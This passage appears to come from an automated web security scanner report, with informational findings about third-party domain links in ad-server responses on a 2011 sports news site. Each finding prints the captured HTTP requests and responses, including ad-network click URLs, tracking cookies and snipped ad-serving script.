bEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTnhRVjlCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFVOHhRMUJWUkVGQlFVRjNTVUZITUdKSFdtMXZjVlJxWlZKQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNWFqbGxVa2RTYkdzeVZsbElURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1686381690?">\n'+
'</SCRIPT>
...[SNIP]...
</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79995&c5=175212&c6=&cv=1.3&cj=1&rn=316549716" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_353062_content);

18.9. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=d501e7c8&rnd=10182749363593758&clkurl=http://ib.adnxs.com/click/UrgehetR6D9SuB6F61HoPwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQAGYE3dcKYhH_ayDGovBdy_Y-vVNAAAAAIwuAAC1AAAAlgIAAAIAAACMcAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gANAYBAgUCAQQAAAAA1SDEsgAAAAA./cnd=!3ASnJwjXkAUQjOEZGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjqR22Pr1Te2WBMjilQfg48WXCdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAL4BcACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAbFraj6l4H1vDQ%26num%3D1%26sig%3DAGiWqtzg1K0ys-dZ_vtnOBuByoLCRz8ULQ%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=80815&c5=177358&c6=&cv=1.3&cj=1&rn=402127186

Request

GET /ads/?t=i&f=j&p=5112&pl=d501e7c8&rnd=10182749363593758&clkurl=http://ib.adnxs.com/click/UrgehetR6D9SuB6F61HoPwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQAGYE3dcKYhH_ayDGovBdy_Y-vVNAAAAAIwuAAC1AAAAlgIAAAIAAACMcAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gANAYBAgUCAQQAAAAA1SDEsgAAAAA./cnd=!3ASnJwjXkAUQjOEZGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjqR22Pr1Te2WBMjilQfg48WXCdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAL4BcACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAbFraj6l4H1vDQ%26num%3D1%26sig%3DAGiWqtzg1K0ys-dZ_vtnOBuByoLCRz8ULQ%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984167&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165620&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307966165257&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1770&xpc=V8625tKlN9&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUfnX5Xl6I3ndrXm_xOvHgmAVmRFcDA3gBY2Bg4GRgmv6bgdVtKQOj3hYGhk9_GEBiDIwGHZfapjAwbfdjYPUMYWC02sPA8A8oDpOru8rANDGUgdVWhIFR6ykDw_t7cLn9pzIZmPbdZWC1m8_AaH.EgZEpBCF35B5ufbte4ta39RfQnT.A7lwBdOdqoDs_w83c9RPoh.3uQHcmMzCaA.36ZYaQe_aKgSnjEQPL018MjGqrGBju5cPkZG6oLgeymXDq3a3Fi9PO3aq6QL0Mvl.DGRi4GRjkKxllGBkYWDYwigIpBgNGBhYGhvSpYEHFE4zcQMGFBxgZgNTypWAl6zzAlNQSRn6g4KJzYLll9YyCQB406EHmMwAA561b_Q--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU2m.0eqiqClJN.7y5_PGFGq3y6NcDA3gBY2Bg4GJg2nKOgdWzm4HRej0Dw78vDAwMnAwMjAYdt18qMjBN_83A6raUgVFvCwPDpz9wuUttUxiYtvsB9YUwMFrtAeoD6oHqu1R3lYFpYigDq60IA6PWUwaG9_fgcvtPZTIw7bvLwGo3n4HR_ggDI1MIQu7IPdz6dr3ErW_rL6A7fwDduQLoztVAd36Gm7nrJyfQne5AdyYzMJoD7fplhpB79oqBKeMRA8vTXwyMaqsYGO7lw.RkbqguB7KZcOrdrcWL087dqrpAvQy.X4MZGLgZGOQrGWUYGRhYNjCKAikGA0YGVgaG9KlgQcUTjNxAwYUHGBmA1PKlYCXrPMCU1BJGfqDgonNguWX1jIJAHjRaQOYzAAAMoGPZ; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:56:11 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1926
Date: Mon, 13 Jun 2011 11:56:11 GMT

_346507_amg_acamp_id=177358;
_346507_amg_pcamp_id=80815;
_346507_amg_location_id=65268;
_346507_amg_creative_id=346507;
_346507_amg_loaded=true;
var _amg_346507_content='<script language="Javascript">
...[SNIP]...
</noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=80815&c5=177358&c6=&cv=1.3&cj=1&rn=402127186" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_346507_content);

18.10. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=bd4cdb65&rnd=7862118608318269&clkurl=http://ib.adnxs.com/click/pHA9CtejEkCkcD0K16MSQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQILl08oQGHZs_ayDGovBdy_9B_ZNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAAQ0BAgUCAQQAAAAA1B8dMgAAAAA./cnd=!cAXULQjc3gQQyegXGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBGpAj_Af2Td78OuPLsQeZuMCCDNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCtCTAAgTIAoXSzwqoAwHoA4gC6APTKegDtQjoAxT1AwAAAMCABtGxmZqKk43kQQ%26num%3D1%26sig%3DAGiWqtwHrhU44K0-Tpb07XjtCvFJalVxJw%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79701&c5=177991&c6=&cv=1.3&cj=1&rn=519367984
http://servedby.adxpose.com/adxpose/find_ad.js

Request

GET /ads/?t=i&f=j&p=5112&pl=bd4cdb65&rnd=7862118608318269&clkurl=http://ib.adnxs.com/click/pHA9CtejEkCkcD0K16MSQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQILl08oQGHZs_ayDGovBdy_9B_ZNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAAQ0BAgUCAQQAAAAA1B8dMgAAAAA./cnd=!cAXULQjc3gQQyegXGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBGpAj_Af2Td78OuPLsQeZuMCCDNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCtCTAAgTIAoXSzwqoAwHoA4gC6APTKegDtQjoAxT1AwAAAMCABtGxmZqKk43kQQ%26num%3D1%26sig%3DAGiWqtwHrhU44K0-Tpb07XjtCvFJalVxJw%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532138&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307969532175&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=114&xpc=7VyOei7CI6&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUIJjiCKHQ2hbNz1frZeo2glhRWy8DA3gBdZLLK4RRGIef9.RzSZJioylZsFAuSYiwc1lQwl8wCiXWErKZhJQiZTPIIORSpBAWFrKwUErJJEUNRbkN45LXNOZbzeo9533O77I4QCLG3YFVv47k78NbBxAHkjfge.nCeIaV.ZGCOfDf2.xxBLPcjuXMRIq74Ss6zK5csZjVKazmNaSkGr4XbNbvwEw6sWp6kNxBeNbMUN7FQzZm40TZEFK6Cj8vNvOlYyY.sSo9SM4GPH2F2alrDLNVp7pGzdtVnfYPeZ72nmFGm7DKkpGsG3j0htn.cRtm7xKr3I1UHCKm0WaH3si6bV9k3WZAe75rzwXtuaQ9n8Oe2x9x2rNKezqRIs0KFNrs9g7Tek3UTQDJXARv5z9znGfM69lE1O5kJUTM3MnIVi21rw0QD2ld4hCIWpMUHeQJMdAyHlymH0m8LqcPBB3znuCTlergSJ2VRF3OnATZXJ8k6S30Rf78.QWV5oeH

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUGV3QELJBi.aSmpvB5xwfCz8vAu0DA3gBdZLPS1RRFMc_5zJPRiQmoTYxILNwFgNjIpKRWLjRaVEQOX_BCCXEuJawaCNTSSAUQRt_4DiS0hgYgRPqwoW0cCEEgjiEoDAGCo1lPjU6vmbeW727Ofeez_2e8z3cC1zEfO7Gut2LtCXBbgNqQZqfhzrTmNE01r2PSMsS_E5XWaZ0OIDJDis7Qlqn4OiHxw5eYWYfYaWiyPXHcFrjsu9DQUx.DKt3DrmRgLNpjz0LY96l1MsgcvUFlLXnfy.Zzf04Zn5N2UukPQ9_Dz1WimDenmB1ZZGmefh56rL1odc6313V9Wi_L6rT2So11598w4wksTouIbEdOCi6bOlrH2ZxC.vmKHJrBTE9Hlsp.usWSv66T7b6_KM.p9XnjPosuzUXjmsr75DSd9Be9jWP7e5hHm4T2LGR6Hso9ldZeKMxp3vjqy3ELvj2LDTGVcudX_ehDhoGJCwQmJPLGmgWgvDgjZOMrEqdJseXBQ25rHPlQ8IJVyYlpMmJNYdNPZV6PTnf59ymrn8Lt4rk; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 12:52:16 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2374
Date: Mon, 13 Jun 2011 12:52:15 GMT

_346468_amg_acamp_id=177991;
_346468_amg_pcamp_id=79701;
_346468_amg_location_id=64055;
_346468_amg_creative_id=346468;
_346468_amg_loaded=true;
var _amg_346468_content='<script type="text/javascript"
...[SNIP]...
</script>\n'+
'<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79701&c5=177991&c6=&cv=1.3&cj=1&rn=519367984" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_346468_content);

18.11. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=c39d0d8d&rnd=78214142774231730&clkurl=http://ib.adnxs.com/click/1qNwPQrX6z_Xo3A9CtfrPwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQIlCmo4h5PRn_ayDGovBdy9v_vVNAAAAAIwuAAC1AAAAlgIAAAIAAADrjwUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAzgUBAgUCAQQAAAAApSPZeAAAAAA./cnd=!GQVlKgi-zQQQ658WGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBSyncb_71TYauCaX6lAeF17nnCdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALmBsACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAbUz6WH1LWE15EB%26num%3D1%26sig%3DAGiWqtwJGbVROOR9ohUKNWkZUkv5h-33kQ%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79014&c5=173452&c6=&cv=1.3&cj=1&rn=1447279009

Request

GET /ads/?t=i&f=j&p=5112&pl=c39d0d8d&rnd=78214142774231730&clkurl=http://ib.adnxs.com/click/1qNwPQrX6z_Xo3A9CtfrPwAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQIlCmo4h5PRn_ayDGovBdy9v_vVNAAAAAIwuAAC1AAAAlgIAAAIAAADrjwUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAzgUBAgUCAQQAAAAApSPZeAAAAAA./cnd=!GQVlKgi-zQQQ658WGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBSyncb_71TYauCaX6lAeF17nnCdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALmBsACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAbUz6WH1LWE15EB%26num%3D1%26sig%3DAGiWqtwJGbVROOR9ohUKNWkZUkv5h-33kQ%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985085&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967085704&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967085746&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=642594083&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=85&xpc=fI9ap0W4vx&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUEk5A0_5WrCwJ6Qtep7i7u6pH1UsDA3gBdZHNK4RRFIefc_OKJCk2mpLFWEwNVoiwYyzYGH_BKJSylpDNJFaKlI2PDBPCYqSQsZiFLGYxpZRMUtRYUIZifOSYeN_VrM6957m_e546QDFmewgrUI00jsJnPlAIUjd1EyzA7C5j9e0hTT74Cjts0oVZDGB1jiG105CO2uzq0YuJxJXNIM278P3isFQVZuEDqz2E1ETg.dNmieAc5qBbc36dd6w59fhzSYxfYGZ7sVrKEM8dPCVtFj0fxJxcY7UuIW0xxPgdFkvmzh2mcuf2M.r5pp5h9dxSz7T95.F7oXp2qGcAadBZmXqH3T9gBm7Ju8sg1ZuQHP5nrkv3hp5NzuyRR3eRY.aR26tZul57oAgqR8QlkLcn5VqoE3Rt_fPZZtWZFGlz5VTQshHKPtnxZUvFmpRoczWeZesTUqq3v1X__s8PSf12sw--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUzeY1SQHCXN4FYj.Kh6_q8b3co0YDA3gBdZLNK4RRFIefc_P6SEix0ZQsWCjMQoiw87GghL9gFEpZS8hGQkqRsvGRGULMYqQQFhaysFBKySQ1aijKRxhDjmm8s5rVufc893fOs7hAOsY9gdXyjpR64P0BSAFxjgafJjEbPViuAqSiH8KJNrsZScZsLWB1eJHKBvhejbFhB2bOhdU4gJSMwcuhza4eizC.M2XjSNUW_LzGWDAPM_uFVedGin3wHLbZ.cg0ZqdZc226b19z6hj1PB.8wEy1Y1VnIYUBePLb7PC0G3NwjVUzj9QeI6Ytxo798XO7wfi57ZB6fqjnqnquq.eLPXP3M0U969XThZTrrlBZjN3dY7puSQiEkII18Pf.M8dl_oqeTdzsXmFa3J17.UWapemtFVIht08cAgleydaCU0iCzplIM.9EUrW5eCRoWXFHnmw2RErOsmRoc.kswjxDkqm36Df4m88v.GmAEg--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 12:11:30 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1926
Date: Mon, 13 Jun 2011 12:11:30 GMT

_348663_amg_acamp_id=173452;
_348663_amg_pcamp_id=79014;
_348663_amg_location_id=63467;
_348663_amg_creative_id=348663;
_348663_amg_loaded=true;
var _amg_348663_content='<script language="Javascript">
...[SNIP]...
</noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79014&c5=173452&c6=&cv=1.3&cj=1&rn=1447279009" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_348663_content);

18.12. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=a5d83987&rnd=80208794306963680&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9WeGB.XlqKT9FKCMBhTVqhFHQ0NnZW8sdXNhLHQsMTMwNzk2NTU1NDM5MCxjLDM0NjQ1MixwYyw4MDU3MixhYywxNzc5OTgsbyxOMC1TMCxsLDY1MDMzLHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3JVZmhlaFN1N3otdVItRjZGSzd2UHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRTUp5MGd1MGU2aHFfYXlER292QmR5OXYtUFZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCTVNBWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVhBOEJBZ1VDQVFRQUFBQUFiU0tQVWdBQUFBQS4vY25kPSFwQVJ4SlFpOWd3VVF6SkFaR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJCbU5SYnZqMVRiSFdPLV9Mc1FlbnBienRCTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTGVCOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6NmpGU0kyQndnbERMbHZtdEU1b3oxS3prUjhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUYdpcvZVUHMBit47.JlhAJCXBZnlnZW8sdXNhLHQsMTMwNzk2NTU1NjM3MyxjLDM0NTc2NSxwYyw3NzQ5MixhYywxNjk5NzksbyxOMC1TMCxsLDYyMjA0LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU5V2VHQi5YbHFLVDlGS0NNQmhUVnFoRkhRME5uWlc4c2RYTmhMSFFzTVRNd056azJOVFUxTkRNNU1DeGpMRE0wTmpRMU1peHdZeXc0TURVM01peGhZeXd4TnpjNU9UZ3NieXhPTUMxVE1DeHNMRFkxTURNekxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDNKVlptaGxhRk4xTjNvdGRWSXRSalpHU3pkMlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFVwNU1HZDFNR1UyYUhGZllYbEVSMjkyUW1SNU9YWXRVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDVFZOQldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZoQk9FSkJaMVZEUVZGUlFVRkJRVUZpVTB0UVZXZEJRVUZCUVM0dlkyNWtQU0Z3UVZKNFNsRnBPV2QzVlZGNlNrRmFSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkNiVTVTWW5acU1WUmlTRmRQTFY5TWMxRmxibkJpZW5SQ1RtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHVkNPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNk5tcEdVMGt5UW5kbmJFUk1iSFp0ZEVVMWIzb3hTM3ByVWpobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=971871834?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77492&c5=169979&c6=&cv=1.3&cj=1&rn=1727941911

Request

